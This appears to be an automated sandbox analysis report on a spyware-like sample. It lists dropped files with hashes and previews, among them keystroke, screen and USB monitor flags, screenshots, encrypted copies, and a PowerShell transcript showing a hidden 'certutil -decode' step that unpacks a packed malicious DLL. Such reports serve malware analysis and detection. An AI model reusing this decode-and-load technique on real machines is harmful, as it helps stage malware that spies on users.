SHA1:	1547D32448BC572A3BA92D824F60BCE446C923C1
SHA-256:	E6DEBB5D3F9E8A6D9D236F69823E7A338BD4FC6000DF8D28BEA8034E6ACFD702
SHA-512:	D536ECDC18965199CF0C9746D9F00F088CBF9D852C8E8EEF169DD09CF41C9179D24929FDDE07F704D7EC26E36BF46E0D67296A42B847EC017EA43382EBA63CCD
Malicious:	false
Preview:	f.l.a.g.

C:\ProgramData\Software\ESTsoft\Common\flags\KeyboardMonitor Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	data
Category:	dropped
Size (bytes):	8
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:b:b
MD5:	D7A7B80A25465364FE8715DD5AA607B6
SHA1:	1547D32448BC572A3BA92D824F60BCE446C923C1
SHA-256:	E6DEBB5D3F9E8A6D9D236F69823E7A338BD4FC6000DF8D28BEA8034E6ACFD702
SHA-512:	D536ECDC18965199CF0C9746D9F00F088CBF9D852C8E8EEF169DD09CF41C9179D24929FDDE07F704D7EC26E36BF46E0D67296A42B847EC017EA43382EBA63CCD
Malicious:	false
Preview:	f.l.a.g.

C:\ProgramData\Software\ESTsoft\Common\flags\ScreenMonitor Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	data
Category:	dropped
Size (bytes):	8
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:b:b
MD5:	D7A7B80A25465364FE8715DD5AA607B6
SHA1:	1547D32448BC572A3BA92D824F60BCE446C923C1
SHA-256:	E6DEBB5D3F9E8A6D9D236F69823E7A338BD4FC6000DF8D28BEA8034E6ACFD702
SHA-512:	D536ECDC18965199CF0C9746D9F00F088CBF9D852C8E8EEF169DD09CF41C9179D24929FDDE07F704D7EC26E36BF46E0D67296A42B847EC017EA43382EBA63CCD
Malicious:	false
Preview:	f.l.a.g.

C:\ProgramData\Software\ESTsoft\Common\flags\UsbMonitor Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	data
Category:	dropped
Size (bytes):	8
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:b:b
MD5:	D7A7B80A25465364FE8715DD5AA607B6
SHA1:	1547D32448BC572A3BA92D824F60BCE446C923C1
SHA-256:	E6DEBB5D3F9E8A6D9D236F69823E7A338BD4FC6000DF8D28BEA8034E6ACFD702
SHA-512:	D536ECDC18965199CF0C9746D9F00F088CBF9D852C8E8EEF169DD09CF41C9179D24929FDDE07F704D7EC26E36BF46E0D67296A42B847EC017EA43382EBA63CCD
Malicious:	false
Preview:	f.l.a.g.

C:\ProgramData\Software\ESTsoft\Common\list.fdb Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	AIX core file 64-bit
Category:	dropped
Size (bytes):	586
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qjj:Qjj
MD5:	F359D5F994F5D0B9CFC1713B56B02711
SHA1:	8AEFCB99CBC6F32562CA3689A104B3B5B66D279C
SHA-256:	523E9CAE67A124E735949ACDE8C5EAE713C21A120EF844678BD54A1358205F0E
SHA-512:	FD8C6F23F1C29FD70CF81189BE6CBBFF563C2903F32B0FCFCFFAA42D6F90782FE297034640A433A7E591CFD6E149E349AAF84BC4EB7DAB04B03CDC958BBE5198
Malicious:	false
Preview:	..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Software\ESTsoft\Common\list.ldb Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	data
Category:	dropped
Size (bytes):	20
Entropy (8bit):	4.221928094887362
Encrypted:	false
SSDEEP:	3:C5atdIT:g8dk
MD5:	5FEB4EF2BDB1DC5AAAF05C9085A76545
SHA1:	A788457DE6ED4DFCAD3AC917CBCD9F836310BDBE
SHA-256:	0DCED11D04886524C30ED03937C19FEF5D88588C207979596F25855A1B5FA250
SHA-512:	7CC648C69726DBBEA4983F1144FCC54641229E9B484FE58E42FC3F9B8EC401EFD4BD095CA964AC653BCD6F59C56366BD529099372AB883D88735A34AC4436DBB
Malicious:	false
Preview:	/........;...ql.

C:\ProgramData\efVo8cq.sIhn Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	259416
Entropy (8bit):	5.962875804998698
Encrypted:	false
SSDEEP:	6144:9vAIZ4vrucGjFPqQC0uNRwTIfAl69/1el0thoSvCeGrJAGyi0/xe:avrNGjFP9C0unwIAlL0ta6GrJ0Zxe
MD5:	184188B0C846FAB897E0F95E596A6D7C
SHA1:	F5C265A92F919A3372053F6D2B4E057E1B33A992
SHA-256:	CF605E3BB8181ED066B3750917A6244B599B5350F758AFCCB77EF244948A4FF0
SHA-512:	415099EDDCE21E792F72F84D7BD1FEF2BA47CC53A20071B1FEB935E6AA8815E2F5DFFE4AFFC85C8B13BC5318468BBD485DE4F5FFCA0707B6178CDEC6B74EC243
Malicious:	false
Preview:	TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAADawJETnqH/QJ6h/0Ceof9Axcn8QZWh/0DFyfpBK6H/QMXJ/kGZof9AnqH+QB2h/0AAAThAnKH/QFXO+0GOof9AVc78QZSh/0DFyftBjaH/QFXO+kHWof9AGNH2Qdih/0AY0f9Bn6H/QBjRAECfof9AGNH9QZ+h/0BSaWNonqH/QAAAAAAAAAAAAAAAAAAAAABQRQAAZIYDAPhIkmAAAAAAAAAAAPAAIiALAg4aAPACAAAQAAAAAAUAMPsHAAAQBQAAAACAAQAAAAAQAAAAAgAABgAAAAAAAAAGAAAAAAAAAAAQCAAAEAAAAAAAAAIAYAEAABAAAAAAAAAQAAAAAAAAAAAQAAAAAAAAEAAAAAAAAAAAAAAQAAAA4AIIAMAAAADcAQgABAEAAAAACADcAQAAAHAHAAQpAAAAAAAAAAAAAKADCAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADI/QcAMAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABVUFgwAAAAAAAABQAAEAAAAAAAAAAEAAAAAAAAAAAAAAAAAACAAADgVVBYMQAAAAAA8AIAABAFAADwAgAABAAAAAAAAAAAAAAAAAAAQAAA4C5yc3JjAAAAABAAAAAACAAABAAAAPQCAAAAAAAAAAAAAAAAAEAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

C:\ProgramData\glK7UwV.pR9a Download File
Process:	C:\Windows\System32\certutil.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	194560
Entropy (8bit):	7.923746161712757
Encrypted:	false
SSDEEP:	3072:skV6k74dhL0o0oqRT3vnkyVFTUwpsP+wqnsWtIN0KZehS5kxXhJhzYs/Hy9ehqk2:JR8rL0nn3vkyVFoVQZKZew5uXhJ+gy02
MD5:	14E01ED4D086206D3C4B7159DC887F25
SHA1:	2918B5AF300E979593DF44696E947DA396018532
SHA-256:	0A4F2CFF4D4613C08B39C9F18253AF0FD356697368EECDDF7C0FA560386377E6
SHA-512:	ED9A19513F27D40620C38EA9A18CAE3A8B806CDD6ACFA44D9FFF58FAEFD23D2D085E382B10412A01F6672304CBFB3D01AEDAFCF8DE7AB41E3CAFFDF069BD88E6
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 32%, Browse Antivirus: ReversingLabs, Detection: 68%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............@...@...@...A...@...A+..@...A...@...@...@..8@...@U..A...@U..A...@...A...@U..A..@...A..@...A...@...@...@...A...@Rich...@................PE..d....H.`.........." ................0.....................................................`..................................................................p...)......................................................0...........................................UPX0....................................UPX1................................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................3.96.UPX!.$..

C:\ProgramData\temp\1673.tmp-PowerShell_transcript.910646.c593w7K1.20210825105827.txt Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1218
Entropy (8bit):	5.24508468582021
Encrypted:	false
SSDEEP:	24:BxSAF3RCvi3OQx2DOXUWeWH0jeuKK6X4CIym1ZJXANZnxSAZx:BZBRCvqOQoOpHCKYB1ZOZZx
MD5:	1FC1A6A9D49B7BE9CD7323F6B46A5C4A
SHA1:	C56FC949EDBA224809EB44C8492FF3191F71CC68
SHA-256:	427DF863E391AC0A99BA6E457089B03CFE31DAB2DAA506063E4952136C8EAD0B
SHA-512:	AE8D7A1AB33A7B9E5E21A9BFFF6E6DB5C3A95E3AEAAB8127699FD5DD5AEFCE7A6A89EB7EEFB5058DB72A8568F7468F1E0E49F4F14061E0CB1751DB46570A3CCD
Malicious:	false
Yara Hits:	Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: C:\ProgramData\temp\1673.tmp-PowerShell_transcript.910646.c593w7K1.20210825105827.txt, Author: Florian Roth
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210825105828..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 910646 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden certutil -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a..Process ID: 304..PSVersion: 5.1.17134.165..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.165..BuildVersion: 10.0.17134.165..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210825105828..********************..PS>certutil -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a..Input Length = 259416..Output Length = 194560..CertUtil: -decode command completed successful

C:\ProgramData\temp\1673.tmp-PowerShell_transcript.910646.c593w7K1.20210825105827.txt.enc Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	data
Category:	dropped
Size (bytes):	920
Entropy (8bit):	7.8108254057081945
Encrypted:	false
SSDEEP:	24:QhOrzg2T8BqO3WUaHFI0woFkk8W0v810LU455:wQQ4BwoFXHF0LX
MD5:	56221094A71390B5822C1D73879A15F1
SHA1:	491DCED7BD65C1D3F56EE6513066C027F48C2EED
SHA-256:	72547BCD82E273A3F82972BC079DF5B2CB7A2FE934354E27F24008DE8B14562D
SHA-512:	8B23AFC1DA9276928CF1100F3D7B5171E9B13DB0347A8A1B4BFC2AD9C95C2992969FA74E4791583026863E427184F814C60CA0726FBCC43BEE74DD50BF8986FC
Malicious:	false
Preview:	.......H4....+v..Su..%..P....../. .......[..\....../.....A.Q.j.t....4..0.[w.,._...c.......q..f.Ep.h..Q............bm.'Z..XO...;.+...6........?c"2M.b...\.OAx...iA.:....0.<.F.w..jN..T.K..I.......7Y...>...VO.!...5...Y..m..+.....9@8...1..ZXo./.w?mn.).%...R.\|.>..=.....v.J..Zh....f.....v.p..@.....#S%9`?x......n.C.. .?.g...OCL..cqH.r..CF../..Q..HE.k.$].k]...`3X..d.W..I.[.M..\Z.V.1..e}.C..bp..X......._%B..&....>4.K...c8.. ...u..<.......E.e.....@J..\|.U...w.x.#...7.kY.9.]....t8-duS<.[..C..5..o..i..{g4..b...N...........l..8_.V4;...E.UR......kGj.~..qH...~.....>8...P.Z[...'.hG._..tM.tmq...........{.....e.....0.5./....N..09...d,f.qV.g5Z.K.\|.0..(.QZ.^?h...p.p,..Y..5..n...= .XL.K...JHsn.z.#.d....f...t.,St..c.....k..+..q4.....'..1.....I.0,.+$.]$...>E...ZU.2`.33.~8D}.xB@8.......A 0.*.....Jd))QIz3h..MPhL.z......0x.....w..Z...f........... ..D..........D>9."B....5#.%.%...e..N.H...

C:\ProgramData\temp\1673.tmp-PowerShell_transcript.910646.c593w7K1.20210825105827.txt.tmp Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	PDF document, version 1.7
Category:	dropped
Size (bytes):	961
Entropy (8bit):	7.8028574613021675
Encrypted:	false
SSDEEP:	24:Yc06du3AHebtA4U7YovrhEyu11/cWOFHRtn7IWau0rQWukR:y6duX85eyu1x+R9au0rQW1
MD5:	75230310CBF0CC4217481684C1AB7065
SHA1:	8601C7A8E09BB0F3F9BFBD585225BE923C66E0F7
SHA-256:	177BB2A1C42FF7B13211EC0658B5BD42A37156AD8236589059D2725966C3CB68
SHA-512:	3789F5AE891D818E02C8D19A36FE3227CDD61E2DE676893C8C4564FDB6E747F28607396DB884D2148A4B15BC84612BAB3B0B622A4029D35FA9D572EF95F2D69B
Malicious:	false
Preview:	%PDF-1.7..4 0 obj......Y..<..W....6.I..Y...Rv.A.0..+b......Z.....;Di.v].[#.R.....wIS.n....&`...L,T..\|V....jM7.y.N.=......4.....(.eZc.'..gH.^.BK....F.a[)n.......@l.6...Ik.W9....4+...T&.`I].D.E........!.i4..O ...M...?^.u.....wY4or.A.g8q..(....T.vL.W.....ZJ...q1.X`..S..f...A.$..p}......`...L......b..P.k..Nps....T.!.#....%.L@..r0..{&....Y.`...w...d....V.O}.N.&A?.....D.v..m.<.A..h...\~.21...dQ.Ug....\...q+..S>...n..hP.Z-..C.....(......~..q.}(..}.^W3<_..)Vc.C-X..ID.......h.....U...@J.T...N.jS..nW..n..H..m..-t..o.w.'...'\|M...W..V.r...+g..R..(5].<.....o...n...._......@.=..\\|.b...H(.].i..{..=-......<.gT.U...D..CZa.n.Q...?l....e.....g.l.....y. .....h.G(:3....qu..M.z0<.yH......Br....S`.<^..A.../L.SyP..6.?'......XB4+.\|.:..#... ...Ye.....u.......A..]X.......,..^..t.t......1\|-..'.t..+..Z....;.A....-...D...1.[..TQ.Ty....L..T.g....oj.F...?Ed...<........8.....l._.s.+./Ek..?......YV(cV...=..k...#j...r.N..2,b..\|..th.'.c

C:\ProgramData\temp\1673.tmp-PowerShell_transcript.910646.c593w7K1.20210825105827.txt.zip Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	900
Entropy (8bit):	7.3293489758039705
Encrypted:	false
SSDEEP:	12:5jlSrRn8N/SzLVgZFJgu+n5ul/XQ5xPSkOBAJ0e36M1udSrRtKKeSrRoaUL:9GESnVmf25fSxAb3cOt7Zo
MD5:	742409DB7A6DBD329A4DBDF2306FA993
SHA1:	034CB89ED8D2742B5B4A8325DE23E971671B7701
SHA-256:	AF4A7982E810EA3353A9F6846E65835CCA7F7D0E0CE683F830ED6B2A8FF95323
SHA-512:	EA9873FA847CBFA527D3791157C5F1D042CAFD0F586F771348A11A1049D69539883C4F97B0B3534B62A081CC43451959CBADFF1352E4D407CBFF95CD3B26B095
Malicious:	false
Preview:	PK........PW.S............A...1673.tmp-PowerShell_transcript.910646.c593w7K1.20210825105827.txtUT...G.&a..&a..&a.T..0..G.;..C[.......j..........M.`....)...C...P.XvWj.Z.9...3.7....o....g.3..h.vP......I...0H.V........y.......:K..dud0...Y...I...r&]g^.k.j\3....U..W.........o..v.F..<-.Vk..y...%.`zE...7..Ii...B...-B.(9..x..l}...$;.J1I.z..=.o.Z.#......2.(..T.... U.<O.q2+U^.....z.:...G.y.....r....\.FR......I`...r:(.1=)...3~.8..`TQ..j[X...N.t...w.._..6........u...O..M.}....<B...x......jBs..en...q.{...%g..?\.Si...v...m.[.[&...6.l..Y.....H..A.........m..]e^.i7..y}Kgi.Dg>.I.].....*..f].......^l.\.{&....(+h.^~Q@f.3.4...oPK........PW.S..G.........A...1673.tmp-PowerShell_transcript.910646.c593w7K1.20210825105827.txtUT...G.&a..&a..&aPK..........PW.S..G.........A......... .......1673.tmp-PowerShell_transcript.910646.c593w7K1.20210825105827.txtUT...G.&aPK..........x.........

C:\ProgramData\temp\1C75.tmp Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	64408
Entropy (8bit):	7.587474687549308
Encrypted:	false
SSDEEP:	768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
MD5:	6A95989BDB33E31A1CBA8258F4199040
SHA1:	3E81CCB803AA348212AEA8C9E31831DE991F972B
SHA-256:	BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
SHA-512:	D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
Malicious:	false
Preview:	......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$\|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.

C:\ProgramData\temp\2330.tmp Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	64408
Entropy (8bit):	7.587474687549308
Encrypted:	false
SSDEEP:	768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
MD5:	6A95989BDB33E31A1CBA8258F4199040
SHA1:	3E81CCB803AA348212AEA8C9E31831DE991F972B
SHA-256:	BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
SHA-512:	D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
Malicious:	false
Preview:	......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$\|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.

C:\ProgramData\temp\27CE.tmp Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	64408
Entropy (8bit):	7.587474687549308
Encrypted:	false
SSDEEP:	768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
MD5:	6A95989BDB33E31A1CBA8258F4199040
SHA1:	3E81CCB803AA348212AEA8C9E31831DE991F972B
SHA-256:	BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
SHA-512:	D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
Malicious:	false
Preview:	......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$\|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.

C:\ProgramData\temp\3092.tmp Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	64408
Entropy (8bit):	7.587474687549308
Encrypted:	false
SSDEEP:	768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
MD5:	6A95989BDB33E31A1CBA8258F4199040
SHA1:	3E81CCB803AA348212AEA8C9E31831DE991F972B
SHA-256:	BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
SHA-512:	D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
Malicious:	false
Preview:	......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$\|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.

C:\ProgramData\temp\3AED.tmp Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	64408
Entropy (8bit):	7.587474687549308
Encrypted:	false
SSDEEP:	768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
MD5:	6A95989BDB33E31A1CBA8258F4199040
SHA1:	3E81CCB803AA348212AEA8C9E31831DE991F972B
SHA-256:	BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
SHA-512:	D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
Malicious:	false
Preview:	......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$\|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.

C:\ProgramData\temp\3AED.tmp.enc Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	data
Category:	dropped
Size (bytes):	45582
Entropy (8bit):	7.9957540140020535
Encrypted:	true
SSDEEP:	768:a0Lv1svI3HzuTApqUiyzs3CtPEInQH8UcjmbPjeGd3PqHlU50eJiTfX9E:xLrzuTyqUiyzhPE4mbzRVPWE
MD5:	7D65BE4E5C388D53C25E5B60626A2390
SHA1:	057C0F706CDB5826A205D6D3F4D0C5A988159078
SHA-256:	21824CA7A5AE455F3B1CE9FF18E98D3087052EFCA4E8F5CCAAB0B81237DA5C57
SHA-512:	FA4E893CAA63DB29ABFA17890E3B071EBC5C76997DC61ED6DD00D3BB3FED38BF2F9489FCC10515E0F713C4DE65E87E64ACE99E8183139222BB902CC71A46C721
Malicious:	false
Preview:	....U....<i....<.9.IA....s...c...67.w...8F.:.p....$...I%ut...M..i#}'...0S.0-].x..~.4.m..b..../..W.Z\|.V..8..-.g.q...D.?p{.eLp.vn.%Jr.....n.xz!..L..1U..........\|l..._.p,.{<..m}...j.e.....K.t.....r...7..uw....m_...z.a..9.\|.(.Q>.........B=<a..t"...WX..n.R}Mv..)kj..y.._(\o>....X.Lq...4..:.w!4.m0...N4].....$0.sd5.y.X"........gA...O..i......[..#..q.[[...?,.).z.6.m.Q.%...A.....<).;..;.4.n.Z.Nfj.j]:.Fr.~.......o..............I..4.[M$<.P..t..p......f..P5..'..la.r.y..jl...o.I...8.....?I,.g..F+......FR0....(......*V...[7<?.n^.@...-...q...JJ.F.Z.....ng#9.......{."U.y.....j...P.{...H.....5%...!M\.....J.D.m..k..p7..$mc..~..H..28...aUk........J.............RA..V..xs]......4..H...n..yP.;....@....0..]x........3.q....C...0..\.")..QT........\.O%.(...PHz%,.....E?.+X.....k.f..%.3D....[..BV...>k........qR..,..8=9..\|...l....(..$=..li....J..T.q.Z?...?....}..>Q.s.K.3A[,M.....j..X..6!.tW..A...q...e...pWCFb.;.......mJf....S.}.g...B...I{r.v.\|7...{q.....E.7..R

C:\ProgramData\temp\3AED.tmp.tmp Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	PDF document, version 1.7
Category:	dropped
Size (bytes):	45623
Entropy (8bit):	7.996741836304097
Encrypted:	true
SSDEEP:	768:0Afq9jk3ooTGcYWbdMNXIF0iGemczb+ueTj9ct42c+pwK+dG3jfFH4RBKV41LRfH:rSk3ooTGgbuXIF7OcP94c62ngdqjSREQ
MD5:	86B6C3B388D07FE73E8F86A81DD25A86
SHA1:	8855593CEE5C48845837E97720DE8BEF4B67E006
SHA-256:	F0D96AB6E8F13006D378BC03C0ECBF08907247775CD2638BF5F782267C0E59A4
SHA-512:	5F639CD16B08A623DBE901BD951CDE3621FF0E1C5C9BA91F188DD9951B51012F1FF3EC9B5CC42731596B209A6061D9D3EDB04F43CB810956817F707B98D27E53
Malicious:	false
Preview:	%PDF-1.7..4 0 obj....!Xk.'.u..:.U..?0..k.r..V..}..'.+..R.nB.)+.g....S+G......3..mI{...(.v...D....K..............c.hF.{.NYD.a.?R...#X....C.U..f2.S)....`K.Hp..Q#y.ks\|..1.}p..;S.._yTl.v.>.".....l..V.....Qt....a......U.D]a&.....`.X......4...M.P..Ro=...>ba0.;h.....pfE...ibm.....@.s......b.Aa.mMl....h."$C.{P.c_...(.[....;y..............;..%...;.3p...,....6.....o..B....H..{.\|..J.7@..kz../...@.c...a.}E.'B`.3...3...>.P}...X..Z3evUm..-.X}.A...Y....?..s9.kq...:.y._T\|NQ.Qj..{".@.C.....sj!....M9...z.J.V.....y........X.+.#QX.=.@....q6\|Fe......p..x9.l....d..g{.y.5.a.9S.N....m.3......UQW.a.p...um>....j$X.........D.......#...%d/!p..2.l..P...ep..K.R..3..W4...Ww..$i.....jR.o....=.2m...l........0uBy....-\|.7.;W.........;.gF`.c.0-.5p....?...\| .....C.#'A~'.:#..&/3.@..6\|.ond..f.9.....[p......#../.X.9..0..h8L.........p..{.......7....kdl#7...o.r'.;...7..+.$i..o.x0<..........rX$p..[.N.{g.V.<./..(...a...#l.F...Y....K...9.C..NC...~...........%X.yR.cz.....,.y.i......

C:\ProgramData\temp\3AED.tmp.zip Download File
Process:	C:\Windows\System32\regsvr32.exe
